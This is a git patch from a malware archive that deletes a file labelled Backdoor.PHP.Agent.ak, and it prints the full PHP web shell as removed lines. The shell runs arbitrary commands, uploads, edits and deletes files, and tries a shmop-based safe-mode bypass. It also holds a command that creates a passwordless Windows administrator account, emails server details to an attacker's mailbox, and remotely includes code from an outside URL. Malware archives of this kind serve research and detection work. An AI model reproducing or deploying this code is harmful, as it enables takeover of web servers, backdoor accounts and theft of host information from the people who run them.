From f19db50cd6b0eca87c2f840e598a79452554d915 Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Thu, 15 Oct 2020 00:08:12 -0500 Subject: [PATCH] Delete Backdoor.PHP.Agent.ak Low quality N/A VX --- PHP/Backdoor.PHP.Agent.ak | 712 -------------------------------------- 1 file changed, 712 deletions(-) delete mode 100644 PHP/Backdoor.PHP.Agent.ak diff --git a/PHP/Backdoor.PHP.Agent.ak b/PHP/Backdoor.PHP.Agent.ak deleted file mode 100644 index 767e7a26..00000000 --- a/PHP/Backdoor.PHP.Agent.ak +++ /dev/null @@ -1,712 +0,0 @@ - - - - - - -By binushacker > AoD > CMD > File List - - - -

..:: http://www.binushacker.com #binushacker @ irc.dal.net ::..

-OFF"; } - else { $SafeMode = "$SafeMode"; } - - $btname = 'backtool.txt'; - $bt = 'http://www.full-comandos.com/jobing/r0nin'; - $dc = 'http://www.full-comandos.com/jobing/dc.txt'; - $newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup - - -"Administrators" /add Admin;net localgroup "Users" /del Admin'; - $bn = 'http://www.binushacker.com/download/cmd.do'; -// Java Script - echo ""; - - // End JavaScript - - /* Functions */ - function cmd($CMDs) { - $CMD[1] = ''; - exec($CMDs, $CMD[1]); - if (empty($CMD[1])) { - $CMD[1] = shell_exec($CMDs); - } - elseif (empty($CMD[1])) { - $CMD[1] = passthru($CMDs); - } - elseif (empty($CMD[1])) { - $CMD[1] = system($CMDs); - } - elseif (empty($CMD[1])) { - $handle = popen($CMDs, 'r'); - while(!feof($handle)) { - $CMD[1][] .= fgets($handle); - } - pclose($handle); - } - return $CMD[1]; - } - -if (@$_GET['chdir']) { - $chdir = $_GET['chdir']; -} else { - $chdir = getcwd()."/"; - } -if (@chdir("$chdir")) { - $msg = " Pintu Masuk ke Direktori, OK!"; -} else { - $msg = "Error: Gagal memasukkan ke folder!"; - $chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']); -} - $chdir = str_replace(chr(92), chr(47), $chdir); - -if (@$_GET['action'] == 'upload') { - $uploaddir = $chdir; - $uploadfile = $uploaddir. $_FILES['userfile']['name']; - if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . - -$_FILES['userfile']['name'])) { - $msg = "{$_FILES['userfile']['name']}, arsip valid, sukses dimuat. - -"; - } else { - $msg = "Error: gagal menyalin arsip."; - } -} -elseif (@$_GET['action'] == 'mkdir') { - $newdir = $_GET['newdir']; - if (@mkdir("$chdir"."$newdir")) { - $msg = "{$newdir}, folder - -berhasil dibuat. "; - } else { - $msg = "Error: Pembuatan folder gagal."; - } -} -elseif (@$_GET['action'] == 'newfile') { - $newfile = $_GET['newfile']; - if (@touch("$chdir"."$newfile")) { - $msg = "{$newfile}, berhasil - -dibuat! "; - } else { - $msg = "Error: Pembuatan arsip gagal!"; - } -} - -elseif (@$_GET['action'] == 'del') { - $file = $_GET['file']; $type = $_GET['type']; - if ($type == 'file') { - if (@unlink("$chdir"."$file")) { - $msg = "{$file}, Berhasil - -menghapus arsip (file)!"; - } else { - $msg = "Error: Gagal menghapus arsip (file)!"; - } - } elseif ($type == 'dir') { - if (@rmdir("$chdir"."$file")) { - $msg = "{$file}, Berhasil - -menghapus folder!"; - } else { - $msg = "Error: Gagal menghapus folder!"; - } - } -} -elseif (@$_GET['action'] == 'chmod') { - $file = $chdir.$_GET['file']; $chmod = $_GET['chmod']; - if (@chmod ("$file", $chmod)) { - - $msg = "Chmod dari {$_GET['file']} berubah menjadi - - -$chmod : Sukses!"; - } else { - $msg = 'Error: Gagal mengubah chmod.'; - } -} -elseif (@$_GET['action'] == 'rename') { - $file = $_GET['file']; $newname = $_GET['newname']; - if (@rename("$chdir"."$file", "$chdir"."$newname")) { - $msg = "Archive {$file} - -named for {$newname} successfully!"; - } else { - $msg = "Error: Gagal mencalonkan arsip."; - } -} -elseif (@$_GET['action'] == 'copy') { - $file = $chdir.$_GET['file']; $copy = $_GET['fcopy']; - if (@copy("$file", "$copy")) { - $msg = "{$file}, disalin - -menjadi {$copy} - - -Berhasil!"; - } else { - $msg = "Error: Gagal menyalin {$file} menjadi {$copy}"; - } -} -/* Parte Atualiza 02:48 12/2/2006 */ - -elseif (@$_GET['action'] == 'cmd') { - if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; } - if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; } - $cmd = stripslashes(trim($cmd)); - $result_arr = cmd($cmd); - - $afim = count($result_arr); $acom = 0; $msg = ''; - $msg .= "

Hasil : ".$cmd."

"; - if ($result_arr) { - while ($acom <= $afim) { - $msg .= "

".@$result_arr[$acom]."

"; - $acom++; - } - } - else { - $msg .= "

Error: Gagal mengeksekusi perintah.

"; - } -} -elseif (@$_GET['action'] == 'safemode') { -if (@!extension_loaded('shmop')) { - echo "Loading... module
"; - - if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) { - @dl('php_shmop.dll'); - } else { - @dl('shmop.so'); - } -} - -if (@extension_loaded('shmop')) { - echo "Module: shmop loaded!
"; - - $shm_id = @shmop_open(0xff2, "c", 0644, 100); - if (!$shm_id) { echo "Couldn't create shared memory segment\n"; } - $data="\x00"; - $offset=-3842685; - $shm_bytes_written = @shmop_write($shm_id, $data, $offset); - if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of - -data\n"; } - if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; } - echo passthru("id"); - shmop_close($shm_id); - - -} else { echo "Module: shmop tidak dimuat!
"; } -} - -elseif (@$_GET['action'] == 'zipen') { - $file = $_GET['file']; - $zip = @zip_open("$chdir"."$file"); - $msg = ''; -if ($zip) { - - while ($zip_entry = zip_read($zip)) { - $msg .= "Name: " . zip_entry_name($zip_entry) . "\n"; - $msg .= "Actual Filesize: " . zip_entry_filesize($zip_entry) . "\n"; - $msg .= "Compressed Size: " . zip_entry_compressedsize($zip_entry) . "\n"; - $msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\n"; - - if (zip_entry_open($zip, $zip_entry, "r")) { - echo "File Contents:\n"; - $buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry)); - echo "$buf\n"; - - zip_entry_close($zip_entry); - } - echo "\n"; - - } - - zip_close($zip); - -} -} -elseif (@$_GET['action'] == 'edit') { - $file = $_GET['file']; - $conteudo = ''; - $filename = "$chdir"."$file"; - $conteudo = @file_get_contents($filename); - $conteudo = htmlspecialchars($conteudo); - $back = $_SERVER['HTTP_REFERER']; - echo "

Editing {$file} ...

"; - echo ""; - echo ""; - echo ""; - echo ""; - echo "
"; - echo "
"; - echo "

"; - print "

"; - echo "

"; - echo " "; - echo " "; - echo "

"; - echo "
"; -} -elseif (@$_GET['action'] == 'save') { - $filename = "$chdir".$_GET['file']; - $somecontent = $_POST['S1']; - $somecontent = stripslashes(trim($somecontent)); - if (is_writable($filename)) { - @$handle = fopen ($filename, "w"); - @$fw = fwrite($handle, $somecontent); - @fclose($handle); - if ($handle && $fw) { - $msg = "{$_GET['file']}, berhasil diedit!"; - } - } else { - $msg = "{$_GET['file']}, tidak - -bisa ditulisi!"; - } -} - -// Informaçs - $cmdget = ''; - if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; } - if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; } - $cmdget = htmlspecialchars($cmdget); - function asdads() { - $asdads = ''; - if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; } - if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; } - if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; } - if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; } - if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; } - return $asdads; - } - -echo "
"; -echo "
"; -echo "Informasi"; -echo "
"; -echo ""; -echo " "; -echo ""; -echo ""; -echo ""; -echo " "; -echo ""; -echo ""; -echo ""; -echo " "; -echo ""; -echo ""; - if (strtoupper(substr($OS, 0,3) != 'WIN')) { - $Methods = asdads(); - if ($Methods == '') { $Methods = "???"; } - echo ""; - echo " "; - echo ""; - echo ""; - } - -echo ""; -echo " "; -echo ""; -echo ""; -echo ""; -echo " "; -echo ""; -echo ""; -echo "
"; -echo " Sistem : {$OS}
"; -echo " Nama : {$UNAME}
"; -echo " PHP : {$PHPv}, Safe Mode : {$SafeMode}
"; - echo "Methods : {$Methods}
"; -echo " IP : {$IpServer}
"; -echo " Perintah :

"; -echo "
"; -// Dir - -echo "
"; -echo "
"; -if (is_writable("$chdir")) { - if (strtoupper(substr($OS, 0,3) == 'WIN')) { - echo "Dir YES: {$chdir} - Folder Baru | File Baru | Remote - -Access"; - } else { - echo "Dir YES: {$chdir} - Folder Baru | File Baru | Kembali"; - } -} -else { -if (strtoupper(substr($OS, 0,3) == 'WIN')) { - echo "Dir NO: {$chdir} - Foldr Baru | File Baru | Remote - -Access"; - } else { - echo "Dir NO: {$chdir} - Folder Baru | File Baru | Kembali - -"; - } -} - -if (@!$handle = opendir("$chdir")) { - echo " Gue gak bisa masuk folder, Klik sini! untuk embali ke - -folder ori!
"; -} -else { -echo " "; -echo " "; -echo " "; -echo " "; -echo " "; -echo " "; -echo " "; -echo " "; -echo " "; -} else { - echo "

$msg"; - } -echo "

"; -echo " "; -echo " "; -echo "
Upload:"; -echo " "; -echo "
"; -if (@!$msg) { - echo "

Messages

"; -echo " "; -echo " "; -echo " "; -echo " "; -echo " "; -echo " "; -echo " "; -$colorn = 0; - while (false !== ($file = readdir($handle))) { - if ($file != '.') { - if ($colorn == 0) { - $color = "style=\"background-color: #FF9900\""; - } - elseif ($colorn == 1) { - $color = "style=\"background-color: #FFCC33\""; - } - if (@is_dir("$chdir"."$file")) { - $file = $file.'/'; - $mode = 'chdir'; - } else { - $mode = 'edit'; - } - if (@substr("$chdir", strlen($chdir) -1, 1) != '/') { - $chdir .= '/'; - } - if ($file == '../') { - $lenpath = strlen($chdir); $baras = 0; - for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } } - $chdir_ = explode("/", $chdir); - $chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir); - } - $perms = @fileperms ("$chdir"."$file"); - if ($perms == '') { - $perms = '???'; - } - $size = @filesize ("$chdir"."$file"); - $size = $size / 1024; - $size = explode(".", $size); - if (@$size[1] != '') { - $size = $size[0].'.'.@substr("$size[1]", 0, 2); - } else { - $size = $size[0]; - } - if ($size == 0) { - if ($mode == 'chdir') { - $size = '???'; - } - } - echo ""; - echo ""; - if (@is_writable ("$chdir"."$file")) { - if ($mode == 'chdir') { - if ($file == '../') { - echo ""; - } else { - echo ""; - } - } else { - if (is_readable("$chdir"."$file")) { - echo ""; - } else { - echo ""; - } - } - } - else { - if ($mode == 'chdir') { - if ($file == '../') { - echo ""; - } else { - echo ""; - } - } else { - if (@is_readable("$chdir"."$file")) { - echo ""; - } else { - echo ""; - } - } - } - echo ""; - if ($mode == 'edit') { - echo ""; - } else { - echo ""; - } - echo ""; - if ($colorn == 0) { - $colorn = 1; - } - elseif ($colorn == 1) { - $colorn = 0; - } - } - } - closedir($handle); -} - - $OS = @PHP_OS; - $UNAME = @php_uname(); - $PHPv = @phpversion(); - $SafeMode = @ini_get('safe_mode'); - - if ($SafeMode == '') { $SafeMode = "OFF
"; } - else { $SafeMode = "$SafeMode
"; } - - - $injek=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); - - $psn=("OS = " . $OS . "
UNAME = " . $UNAME . "
PHPVersion = " . $PHPv . "
Safe - -Mode = " . $SafeMode . "
http://" . $injek . "
Ingat jangan - -pakai Injek Ini.
By: binushacker"); - - $header = "From: $_SERVER[SERVER_ADMIN] <$from>\r\nReply-To: $replyto\r\n"; - $header .= "MIME-Version: 1.0\r\n"; - If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; - If ($file_name) $header .= "--$uid\r\n"; - $header .= "Content-Type: text/$contenttype\r\n"; - $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; - $header .= "$message\r\n"; - If ($file_name) $header .= "--$uid\r\n"; - If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; - If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; - If ($file_name) $header .= "Content-Disposition: attachment; - -filename=\"$file_name\"\r\n\r\n"; - If ($file_name) $header .= "$content\r\n"; - If ($file_name) $header .= "--$uid--"; - $to = ("binushacker@hackermail.com"); - $subject = ("scan bos"); - mail($to,$subject,$psn,$header); - -@include "$bn"; -?> -
Permision Nama File Kapasitas Perintah
$perms $file $file $file $file $file - - - $file $file $file $size KB Rename | Del - - -| Chmod | Copy Rename | Del - -| Chmod | Copy
- -
- - - - - - - - - -